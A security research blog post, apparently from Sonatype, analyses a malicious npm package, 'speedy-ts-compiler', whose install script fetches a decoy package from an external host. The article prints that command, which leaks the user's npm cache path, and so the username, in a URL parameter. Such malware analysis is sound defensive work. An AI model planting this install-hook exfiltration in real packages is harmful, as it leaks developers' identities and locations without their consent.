npm package downloads another package while exfiltrating your IP address and username

by Ax Sharma on May 6, 2022

On any given day, Sonatype’s security research team analyzes dozens to hundreds of suspicious packages published to open source registries including npm and PyPI.

Most of these packages end up being dependency confusion candidates or typosquatting malware.

But, this one—”speedy-ts-compiler” stood out to us.

The package in question was flagged by Sonatype’s automated malware detection bots within a few hours of its publication to npm.

Sponsorships Available

At a first glance, the component name “speedy-ts-compiler” with just one peculiar version, “100.0.2,” combined with an empty README page on npm, raises red flags as to whether this was a suspicious package.

Interestingly, TypeStrong’s official docs cite “speedy-ts-compiler” in places as an example of a hypothetical compiler (transpiler).

Downloads another npm package on install

When you take a look at what’s going inside the package, the manifest file (package.json) begins to tell the full story.

At the install stage, “speedy-ts-compiler” runs a simple npm script:

npm install http://<external hostname>/tastytreats-1.0.0.tgz?yy=`npm get cache`

It may seem like, as soon as if, the npm package is installing another npm package “tastytreats” from an external URL. And that is true, to an extent.

But we noticed, “tastytreats-1.0.0.tgz” installed by “speedy-ts-compiler” was practically empty, with nothing but skeleton code within.

Why would any developer create a package—good or bad, that installs another empty package on your system?

The answer is, that it’s merely a distraction tactic. The GET parameter “yy” present in the URL is essentially exfiltrating the path to your npm cache, retrieved via the ‘npm get cache’ command.

To the developer, this would effectively reveal your system’s username. And the HTTP request itself reveals your IP address to the package’s owner.